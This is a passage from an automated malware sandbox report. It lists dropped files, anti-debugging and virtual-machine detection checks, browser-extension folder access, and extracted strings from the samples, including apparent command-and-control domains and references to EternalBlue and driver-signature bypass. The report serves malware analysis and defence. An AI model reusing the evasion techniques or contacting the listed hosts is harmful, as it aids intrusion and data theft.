      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nss3[2].dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mozglue[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exeJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libvdr_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\libssp-0.dllJump to dropped file
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libattachment_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nss3[1].dll
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\freebl3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\lua\liblua_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeDropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeRegistry key enumerated: More than 154 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe TID: 6876Thread sleep count: 226 > 30
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe TID: 7108Thread sleep time: -45000s >= -30000s
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe TID: 6584Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe TID: 6712Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe TID: 7024Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe TID: 6620Thread sleep count: 199 > 30
      Source: C:\Program Files (x86)\Company\NewProduct\jooyu.exe TID: 6640Thread sleep time: -30000s >= -30000s
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe TID: 5512Thread sleep time: -60000s >= -30000s
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeLast function: Thread delayed
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeLast function: Thread delayed
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0045F948 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0045FA71h
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0043C650 lstrlenW,GetFileSizeEx,SetCommState,GetOverlappedResult,GetMenuInfo,GetMenuCheckMarkDimensions,GetMessageTime,GetConsoleAliasesLengthA,SearchPathW,ReleaseActCtx,LoadLibraryW,GlobalFix,GetBinaryTypeW,SetThreadLocale,SetProcessPriorityBoost,EnumResourceNamesW,FreeEnvironmentStringsA,FindFirstFileA,FindNextFileW,CreateDirectoryExW,GetLocalTime,WriteProfileSectionA,GetPrivateProfileStringW,WriteFile,SetVolumeLabelW,BuildCommDCBW,InterlockedExchange,FindResourceExW,AddAtomW,OpenMutexA,WriteConsoleInputW,GetConsoleScreenBufferInfo,SetConsoleTitleW,CopyFileExW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_004625DE __EH_prolog3_GS,FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00412D8E _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00412F8E __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00405A45 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00405764 __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,CopyFileA,FindNextFileA,FindClose,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0040A5EA _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0045E91A GetSystemInfo,
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
      Source: yevbZfdCqR.exe, 00000001.00000003.651786144.0000000005E51000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X|
      Source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmpBinary or memory string: VMware
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1033025544.0000000001530000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefenderWindows 874[:^xdigit:]\dsefix.exealarm clockapplicationattack_typebad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedgetpeernamegetsocknamehost is nilhttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextnotify-hostorannis.comraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllsecure_bootshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableupdate-dataupload-fileuserenv.dllversion=179vm detectedvmusrvc.exewininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: entersyscalleternalblue:event-existsexit status found av: %sgcpacertraceget_app_namegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsmutex-existsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffertransmitfileulrichard.chunexpected )unknown portunknown typevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWR
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.txt.xml0x%x108020063125: p=:445ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1007887784.0000000000B11000.00000004.00000001.sdmp, Browzar.exe, 0000001D.00000002.1032923448.00000000008BC000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: /app/app.exe100-continue152587890625762939453125Bidi_ControlCDN is emptyCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocWindows 1250Windows 1251Windows 1252Windows 1253Windows 1254Windows 1255Windows 1256Windows 1257Windows 1258Winmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: is unavailable%d smbtest done()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCDN updated: %sCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWData[exploited]DefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For]
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: unixpacketunknown pcupdate-cdnuser-agentuser32.dllvmsrvc.exewildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1033025544.0000000001530000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1033025544.0000000001530000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: unknown network verify-signatureworkbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)%d-%02d-%02d %02d/bots/update-data0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectData[compaign_id]DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIBM Code Page 037IBM Code Page 437IBM Code Page 850IBM Code Page 852IBM Code Page 855IBM Code Page 860IBM Code Page 862IBM Code Page 863IBM Code Page 865IBM Code Page 866If-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't hide WUPcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfilename is emptyfractional secondget-logfile-proxygp.waiting != nilgroom_allocationshandshake failureif-modified-sinceillegal parameterin string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunexpected app IDunknown caller pcwait for GC cyclewine_get_version
      Source: file4.exe, 00000019.00000002.737119021.00000000006E0000.00000040.00000001.sdmpBinary or memory string: Chrome/HEADIsWow64Processkernel32X:\Windows\SysWOW64\ntdll.dllntdll.dllRtlInitUnicodeStringZwOpenFileZwCreateSectionZwMapViewOfSectionNtUnmapViewOfSectionNtQueryInformationProcess{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}RtlRandomExntdll:y--\Driver\Device ParametersEDID(IsActive)(NotActive)BAD EDID!No EDID!--Nm:SYSTEM\ControlSet001\Enum\DISPLAY\\.\PhysicalDrive%d---VMwareVirtualBoxVBoxQEMUGraphics AdapterRDP Reflector DisplayDisplay AdapterNon-PnPVMwareVirtualBoxVBoxQEMUWestern Disk HARDDISK(1):(2):L
      Source: gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.965425168.00000000006F3000.00000004.00000020.sdmp, svchost.exe, 00000025.00000000.942975420.000001DA2963F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1033025544.0000000001530000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmpBinary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For]
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeSystem information queried: ModuleInformation
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeSystem information queried: CodeIntegrityInformation
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeSystem information queried: KernelDebuggerInformation
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exeProcess queried: DebugPort
      Source: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exeProcess queried: DebugPort
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01287E52 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01284938 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01293947 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_012939BC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_0129398B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00401000 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_00B19665 push dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01250360 __aulldiv,__aulldiv,__aulldiv,__aulldiv,lstrlenA,GetProcessHeap,HeapAlloc,lstrcpynA,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetOpenA,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetOpenUrlA,InternetOpenUrlA,InternetReadFile,InternetReadFile,InternetReadFile,InternetReadFile,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,__aulldiv,InternetCloseHandle,InternetCloseHandle,
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01253465 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: 1_2_01287E52 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
